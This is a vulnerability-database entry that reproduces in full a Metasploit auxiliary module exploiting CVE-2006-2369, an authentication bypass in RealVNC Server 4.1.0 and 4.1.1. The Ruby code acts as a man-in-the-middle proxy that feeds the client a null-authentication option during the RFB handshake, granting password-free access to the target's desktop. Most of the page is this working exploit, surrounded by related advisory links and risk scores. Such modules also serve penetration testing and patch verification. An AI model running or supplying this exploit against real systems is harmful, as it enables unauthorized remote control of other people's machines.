Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RealVNC Authentication Bypass

🗓️ 26 Aug 2011 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 30 Views

RealVNC Authentication Bypass in version 4.1.0 and 4.1.1. Sets up a proxy listener on LPORT and proxies to the target server. Exploits an Authentication Bypass Vulnerability.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Improper Authentication in Vnc Realvnc
8 Mar 202608:00
githubexploit
Circl		CVE-2006-2369
26 Aug 201100:00
circl
Check Point Advisories		RealVNC Password Authentication Bypass (CVE-2006-2369)
25 May 200600:00
checkpoint_advisories
CVE		CVE-2006-2369
15 May 200616:00
cve
Cvelist		CVE-2006-2369
15 May 200616:00
cvelist
Debian CVE		CVE-2006-2369
15 May 200616:00
debiancve
Exploit DB		RealVNC - Authentication Bypass (Metasploit)
26 Aug 201100:00
exploitdb
Exploit DB		RealVNC 4.1.0/4.1.1 - Authentication Bypass
13 May 201200:00
exploitdb
exploitpack		RealVNC 4.1.04.1.1 - Authentication Bypass
13 May 201200:00
exploitpack
Tenable Nessus		FreeBSD : vnc -- authentication bypass vulnerability (4645b98c-e46e-11da-9ae7-00123fcc6e5c)
19 May 200600:00
nessus
Rows per page
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
 
class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::Tcp
     
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'RealVNC Authentication Bypass',
            'Description'    => %q{
                This module exploits an Authentication Bypass Vulnerability
                in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
                listener on LPORT and proxies to the target server
 
                The AUTOVNC option requires that vncviewer be installed on
                the attacking machine. This option should be disabled for Pro
            },
            'Author'         =>
                [
                    'hdm', #original msf2 module
                    'TheLightCosine <thelightcosine[at]gmail.com>'
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 13641 $',
            'References'     =>
                [
                    ['BID', '17978'],
                    ['OSVDB', '25479'],
                    ['URL', 'http://secunia.com/advisories/20107/'],
                    ['CVE', 'CVE-2006-2369'],
                ],
            'DisclosureDate' => 'May 15 2006'))
 
        register_options(
            [
                OptAddress.new('RHOST', [true, 'The Target Host']),
                OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
                OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
                OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
            ], self.class)
    end
 
    def run
        #starts up the Listener Server
        print_status("starting listener")
        listener = Rex::Socket::TcpServer.create(
                'LocalHost' => '0.0.0.0',
                'LocalPort' => datastore['LPORT'],
                'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
            )
 
        #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
        #targetting the proxy listener.
        if (datastore['AUTOVNC'])
            unless (check_vncviewer())
                print_error("vncviewer does not appear to be installed, exiting!!!")
                return nil
            end
            print_status("Spawning viewer thread") 
            view = framework.threads.spawn("VncViewerWrapper", false) {
                    system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
            }
        end
 
        #Establishes the connection between the viewier and the remote server
        client = listener.accept
        add_socket(client)
 
        s = Rex::Socket::Tcp.create(
                'PeerHost' => datastore['RHOST'],
                'PeerPort' => datastore['RPORT'],
                'Timeout' => 1
                )
        add_socket(s)
        serverhello = s.gets
        unless serverhello.include? "RFB 003.008"
            print_error("The VNCServer is not vulnerable")
            return
        end
 
        #MitM attack on the VNC Authentication Process
        client.puts(serverhello)
        clienthello = client.gets
        s.puts(clienthello)
        authmethods = s.recv(2)
        print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
        client.write("\x01\x01")
        client.recv(1)
        s.write("\x01")
        s.recv(4)
        client.write("\x00\x00\x00\x00")
 
        #handles remaining proxy operations between the two sockets
        closed = false
        while(closed == false)
            sockets =[]
            sockets << client
            sockets << s
            selected = select(sockets,nil,nil,0)
            #print_status ("Selected: #{selected.inspect}")
            unless selected.nil?
                if selected[0].include?(client)
                    #print_status("Transfering from client to server")
                    begin
                        data = client.sysread(8192)
                        if data.nil?
                            print_error("Client Closed Connection")
                            closed = true
                        else
                            s.write(data)
                        end
                    rescue
                        print_error("Client Closed Connection")
                        closed = true
                    end
                end
                if selected[0].include?(s)
                    #print_status("Transfering from server to client")
                    begin
                        data = s.sysread(8192)
                        if data.nil?
                            print_error("Server Closed Connection")
                            closed = true
                        else
                            client.write(data)
                        end
                    rescue
                        closed = true
                    end
                end
            end
        end
 
        #Garbage Collection
        s.close
        client.close
        print_status("Listener Closed")
 
        if (datastore['AUTOVNC'])
            view.kill
            print_status("Viewer Closed")
        end
    end
 
    def check_vncviewer
        vnc =
            Rex::FileUtils::find_full_path('vncviewer') ||
            Rex::FileUtils::find_full_path('vncviewer.exe')
        if (vnc)
            return true
        else
            return false
        end
    end
end



#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Aug 2011 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.92336
realvncauthentication bypassproxylistenerlportexploitvulnerability
30